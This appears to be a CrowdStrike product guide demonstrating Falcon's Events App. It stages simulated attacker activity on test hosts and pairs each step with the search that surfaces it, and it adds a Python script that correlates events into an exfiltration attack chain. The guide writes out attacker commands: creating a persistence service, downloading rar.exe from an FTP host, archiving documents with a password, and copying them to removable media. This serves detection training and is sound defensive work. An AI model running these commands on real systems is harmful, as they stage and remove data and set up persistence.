Visibility is an essential element in next-generation endpoint protection. While legacy endpoint security products were limited to either blocking or allowing an activity, next-generation endpoint protection products add the ability to record activity on the endpoint and store it in a database for future search and investigation. While this may sound simple, there are vast differences in the way this can be implemented.
CrowdStrike delivers superior visibility as a result of its unique architecture. The key points to know about this architecture are:
- The Falcon sensor does more than just record and store events. It puts events in context. It is trivial to simply record events and dump them into a database. This creates a garbage-in-garbage-out scenario for admins that ends up wasting time and driving up infrastructure costs. The Falcon sensor takes a different approach. It actually links related events together to paint an accurate picture of the state of the machine. It then displays that picture to the admin (rather than a stream of unrelated events). Understanding individual events as part of a broader sequence of events allows the sensor to then apply security logic derived from CrowdStrike intelligence. If a sequence of events matches a known indicator of attack, the Falcon sensor will identify the activity as malicious, send a detection alert to the administrator and also block the threat.
- Events recorded by the Falcon sensor are streamed to the cloud and stored in a graph database. This approach ensures that data is accessible to the administrator even if some systems are offline at the time of the search. It also ensures speed and scalability. The CrowdStrike graph database – known as Threat Graph – is designed to return results for all queries in five seconds or less, regardless of the size or the amount of data in the database.
This architecture allows Falcon Endpoint Protection to provide deep visibility across your entire environment in five seconds or less.
How to Get Five Second Visibility Across Your Organization with Falcon Endpoint Protection
In this demo, we’d like to highlight the events app to demonstrate Falcon’s new real-time event retrieval and advanced searches. I’ll start off by just opening a remote desktop session on a host with Falcon installed. Once I’m on a target host, I’ll open a command prompt with elevated privileges.
For this demo, I’ll run a handful of commands that are often associated with an attack just to illustrate how quick, how granular, and just how powerful the searches in Falcon can be. I’ll start by changing directories and then running the command whoami.
In the events app in the Falcon UI, we can immediately search for these types of events. This app uses the Splunk query language, for those who are familiar with Splunk. And for those who aren’t, our Intel ninjas have created a threat hunting guide with their top search recommendations. Here, we’ll simply query IoSessionConnected, or remote desktop sessions launched.
And then in the search results below, we can see the session that we had just created. Since I also ran the command with elevated privileges, we can also query instances where privileges have been elevated by searching UACExeElevation. Running this query against your organization may uncover instances where privilege escalation is being used inappropriately.
The events app allows users to search on any one of the hundreds of different events that the Falcon sensor constantly captures. It’s also able to do this within minutes or even seconds of the event happening on the system. Moving back to the remote desktop session, I’m going to enter a list of commands that could easily be associated with an attack.
First, I’ll launch PowerShell in an attempt to hide all of my actions. Then, I’ll create a directory called exfil on the desktop. To illustrate the breadth of searchable commands, I’ll create a service called Evil Service that starts the ping.exe application, perhaps to check connectivity to one of my C&C servers. Once that is successful, I’ll download a ZIP utility using a connection to my FTP server. In this case, rar.exe, and that will allow me to ZIP and encrypt any documents I’d like to take and, hopefully, evade DLP detection.
Then, finally, I’ll connect an external USB drive and copy the ZIP files to it. A quick inspection in Explorer shows the zipped file and the mounted E drive. While an attacker probably wouldn’t copy something to a local drive, this is something an insider with malicious intent might do.
In this example, I’ve mimicked a number of techniques that are often used once an attacker finds their way into an organization. Oftentimes, if an attacker has gotten this far, your AV has been of little use. Falcon and the events app are a powerful tool for discovering threats or behavior that appear suspicious from either an internal or external actor. Using the PeFileWritten search, we can see the rar.exe file was created.
Using a search such as FsVolumeMounted can show us that an external drive was also attached to the host. While each of the commands I ran could be searched individually, there’s also a powerful search argument that can be used in the events app: the CommandHistory argument. Typing CommandHistory for a single host will list all the commands associated with a recent attack for the selected time period.
In the search results below, we can easily see each command and get a clear picture of what happened to the owned endpoint. In fact, on further inspection, we can even see the passwords used to encrypt the documents. And then towards the end, we can see that they were copied to the E drive.
This is just a small example of how powerful and granular the advanced search capabilities are in the events app. And all this can be done in just a few seconds using Falcon.
In order to proceed, the following requirements must be met:
- Client operating system: Windows 7 SP1 or higher (and server equivalents), Mac OS X Yosemite or higher, RHEL or CentOS 6 or higher, Ubuntu 14.04
- Two Windows test systems with the Falcon sensor installed
- Steps 8 and later require an FTP server and usage of a RAR utility
The purpose of these use cases is to illustrate what events are recorded by the Falcon sensor and to show the speed at which those events can be searched from the Falcon Events App. These use cases represent a tiny subset of the events that are recorded and made searchable. Please contact us to learn about all of our visibility and search capabilities.
Go to the CrowdStrike Falcon Endpoint Protection Login Page and log in
Navigate to Events App
Switch to Test System 1 and start Remote Desktop connection to Test System 2. This remote connection will be recorded.
You can search for this activity in the events app by entering the following search: ComputerName=hostname IoSessionConnected
The results will show that the connection occurred and also provide contextual details of the connection.
Return to the RDP session and choose to run the Windows Command Prompt as Administrator. When prompted, choose Yes to the User Account Control (UAC) prompt.
Return to the Events App and enter the following search: ComputerName=hostname UACExeElevation
The results will show that CMD started, but it will also show the contextual events around the execution along with the details of the UAC elevation.
Return to the RDP session and type “whoami” in the Windows Command Prompt
Go back to the Events App and enter the following search: ComputerName=hostname whoami
The results show that the Falcon sensor can not only see that CMD started, but that it can also see all command activity. Similarly, you can search for activity by user with the following search: ComputerName=hostname UserIdentity
Return to the RDP session and type “powershell” in the Windows Command Prompt. If we execute the next few commands from PowerShell within a Windows Command Prompt, then many of the activities will be obfuscated (a common attacker technique). However, Falcon can see through this obfuscation technique.
In CMD change directory to the desktop and then type “mkdir exfil”
This creates a folder for us to stage data that we will later attempt to exfiltrate.
Go back to the Events App and enter the following search: ComputerName=hostname DirectoryCreate
We can immediately see the creation of the new directory.
Return to the RDP session. In CMD change directory to the exfil directory. Then type: New-Service -name evilsrv -DisplayName "Evil Service" -BinaryPathName C:\Windows\System32\PING.EXE
Go back to the Events App and enter the following search: ComputerName=hostname CreateService
The results tell us that a service was created, but it also shows us all of the context around the service. For example, it also tells us that its purpose is to launch PING.EXE.
THE FOLLOWING STEPS REQUIRE AN FTP SERVER AND A RAR UTILITY
Return to the RDP session. Download a RAR utility from an FTP server in CMD with a command like: Invoke-WebRequest -uri ftp://ftpserver/Rar.exe -OutFile rar.exe
Go to Events App and see that the RAR utility was written with the following search: ComputerName=hostname PeFileWritten
Return to the RDP session. Add all .doc files to a RAR archive and password protect it in CMD with a command like: .\rar.exe a -hpPassword exfil.rar ..\*.doc (the archive name exfil.rar is the file copied to removable media in a later step)
Go to Events App and see that the data was archived with the following search: ComputerName=hostname RarFileWritten
You can also get the details of the archive utility with the following search: ComputerName=hostname rar.exe
The critical thing to know about this data preparation phase is that it was all done inside an existing PowerShell process. This obfuscation technique makes the FTP and RAR activity invisible to most tools, but Falcon can still see it. In fact, Falcon can even detect when an attacker tries to hide an archive file by giving it a benign extension like .txt. This is true because Falcon doesn’t simply look at the file extension; instead, it looks at the entire sequence of events and can see that an archiving utility was used to create the file before it was renamed to .txt (for example).
Falcon can also see removable media activity. To proceed, insert removable media into your test system or mount removable media to your VM. Go to Events App and see that removable media was mounted with the following search: ComputerName=hostname FsVolumeMounted
To continue our data exfiltration example, go to CMD and type: copy .\exfil.rar e:\
This copies the archived data to the removable media device. To see this in the Events App, return to the events app and type the following search: ComputerName=hostname CommandHistory
These search results include all commands executed on the system. This is a quick and easy way to see attacker activity because they typically prefer to use command line interfaces. In this example, you can see the entire attack chain summarized in one simple event.
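The two ideas the walkthrough relies on, that file activity is attributed to the process that performed it regardless of file name (the renamed .rar above), and that individually searchable events can be linked by process lineage into one attack-chain summary (the CommandHistory view), can be shown with a small correlation routine. The following is an added example written for this page, not CrowdStrike code and not the Threat Graph implementation; the event records are constructed to mirror the steps above, and their field names (event_simpleName, ComputerName, TargetProcessId, ParentProcessId, ImageFileName, CommandLine, TargetFileName, SourceFileName, VolumeName) are an assumption modelled on the event names the searches use.

```python
"""Correlate Falcon-style endpoint events into one attack-chain summary.

Added example, not CrowdStrike code. Records and field names are constructed
and modelled on the event names searched for in the walkthrough."""

ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe"}  # assumed archive utility images


def _ev(ts, name, host="TEST2", **fields):
    """Build one constructed event record."""
    return {"ts": ts, "event_simpleName": name, "ComputerName": host, **fields}


# Constructed telemetry for the test host, ordered by timestamp.
EVENTS = [
    _ev(1, "IoSessionConnected", UserName="corp\\jdoe"),
    _ev(2, "ProcessStart", TargetProcessId=100, ParentProcessId=1,
        ImageFileName="cmd.exe", CommandLine="cmd.exe"),
    _ev(3, "UACExeElevation", TargetProcessId=100),
    _ev(4, "ProcessStart", TargetProcessId=200, ParentProcessId=100,
        ImageFileName="powershell.exe", CommandLine="powershell"),
    _ev(5, "DirectoryCreate", TargetProcessId=200,
        TargetFileName="C:\\Users\\jdoe\\Desktop\\exfil"),
    _ev(6, "CreateService", TargetProcessId=200, ServiceDisplayName="Evil Service",
        ServiceImage="C:\\Windows\\System32\\PING.EXE"),
    _ev(7, "PeFileWritten", TargetProcessId=200,
        TargetFileName="C:\\Users\\jdoe\\Desktop\\exfil\\rar.exe"),
    _ev(8, "ProcessStart", TargetProcessId=300, ParentProcessId=200,
        ImageFileName="rar.exe", CommandLine=".\\rar.exe a -hpPassword exfil.rar ..\\*.doc"),
    _ev(9, "FileWritten", TargetProcessId=300,
        TargetFileName="C:\\Users\\jdoe\\Desktop\\exfil\\exfil.rar"),
    # The archive is renamed to look like a text file (the .txt case in the text).
    _ev(10, "FileRename", TargetProcessId=200,
        SourceFileName="C:\\Users\\jdoe\\Desktop\\exfil\\exfil.rar",
        TargetFileName="C:\\Users\\jdoe\\Desktop\\exfil\\notes.txt"),
    _ev(11, "FsVolumeMounted", VolumeName="E:"),
    # A copy to the removable volume, recorded as a write with its source path.
    _ev(12, "FileWritten", TargetProcessId=200, TargetFileName="E:\\notes.txt",
        SourceFileName="C:\\Users\\jdoe\\Desktop\\exfil\\notes.txt"),
]


def process_tree(events):
    """pid -> (parent pid, image name), built from process-start events."""
    return {e["TargetProcessId"]: (e["ParentProcessId"], e["ImageFileName"].lower())
            for e in events if e["event_simpleName"] == "ProcessStart"}


def ancestry(tree, pid):
    """Image names from pid up to the root, e.g. ['rar.exe', 'powershell.exe', 'cmd.exe']."""
    chain = []
    while pid in tree:
        parent, image = tree[pid]
        chain.append(image)
        pid = parent
    return chain


def archiver_outputs(events, tree):
    """Current paths of files an archiver wrote, following renames, so a .rar renamed
    to .txt is still attributed to the archiver by the event sequence, not the name."""
    paths = set()
    for e in events:
        if e["event_simpleName"] == "FileWritten":
            if tree.get(e["TargetProcessId"], (None, ""))[1] in ARCHIVERS:
                paths.add(e["TargetFileName"].lower())
        elif e["event_simpleName"] == "FileRename":
            src = e["SourceFileName"].lower()
            if src in paths:
                paths.remove(src)
                paths.add(e["TargetFileName"].lower())
    return paths


def command_history(events, host):
    """Every command line started on the host, in order (the CommandHistory view)."""
    return [e["CommandLine"] for e in events
            if e["ComputerName"] == host and e["event_simpleName"] == "ProcessStart"]


def attack_chain(events, host):
    """Stages observed on the host, in order, each tied to its process lineage."""
    host_events = [e for e in events if e["ComputerName"] == host]
    tree = process_tree(host_events)
    archives = archiver_outputs(host_events, tree)
    mounted, stages = set(), []
    for e in host_events:
        n, pid = e["event_simpleName"], e.get("TargetProcessId")
        if n == "IoSessionConnected":
            stages.append(("remote_session", e["UserName"]))
        elif n == "UACExeElevation":
            stages.append(("privilege_elevation", ancestry(tree, pid)[0]))
        elif n == "DirectoryCreate":
            stages.append(("staging_directory", e["TargetFileName"]))
        elif n == "CreateService":
            stages.append(("service_persistence", f'{e["ServiceDisplayName"]} -> {e["ServiceImage"]}'))
        elif n == "PeFileWritten" and e["TargetFileName"].lower().rsplit("\\", 1)[-1] in ARCHIVERS:
            stages.append(("tool_download", ancestry(tree, pid)))  # shows the PowerShell-in-CMD lineage
        elif n == "FileWritten" and tree.get(pid, (None, ""))[1] in ARCHIVERS:
            stages.append(("archive_created", e["TargetFileName"]))
        elif n == "FsVolumeMounted":
            mounted.add(e["VolumeName"].lower())
            stages.append(("removable_media", e["VolumeName"]))
        elif (n == "FileWritten" and e["TargetFileName"][:2].lower() in mounted
              and e.get("SourceFileName", "").lower() in archives):
            stages.append(("archive_copied_to_removable", e["TargetFileName"]))
    return stages


EXFIL_PATTERN = ("staging_directory", "tool_download", "archive_created",
                 "removable_media", "archive_copied_to_removable")


def matches_exfil_pattern(stages):
    """True when the staging-to-removable-media stages occur in this order."""
    pos = 0
    for name, _ in stages:
        if pos < len(EXFIL_PATTERN) and name == EXFIL_PATTERN[pos]:
            pos += 1
    return pos == len(EXFIL_PATTERN)


if __name__ == "__main__":
    for stage in attack_chain(EVENTS, "TEST2"):
        print(stage)
    print("exfil pattern matched:", matches_exfil_pattern(attack_chain(EVENTS, "TEST2")))
```

Run stand-alone, the script prints the eight stages in order and reports that the staging-to-removable-media pattern matched. The point of `archiver_outputs` is that the write to E:\notes.txt is still recognised as an archive copy even though nothing in its name says so, because the file was created by rar.exe and then renamed; `ancestry` is what lets the tool download be reported as happening inside a PowerShell spawned from the elevated CMD rather than as an unrelated write.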
CrowdStrike Falcon Endpoint Protection makes it quick and easy to get visibility across your entire organization. The solution is SaaS-based and built on a graph database. This means that administrators get unlimited scalability without any need to invest in on-premises hardware. More importantly, it means that administrators can always get immediate responses to their queries – regardless of deployment size. This document showed a small subset of the events that Falcon captures, and also showed how quickly they can be searched for in the Events App. CrowdStrike is continually adding additional visibility features, so please contact us for the latest information.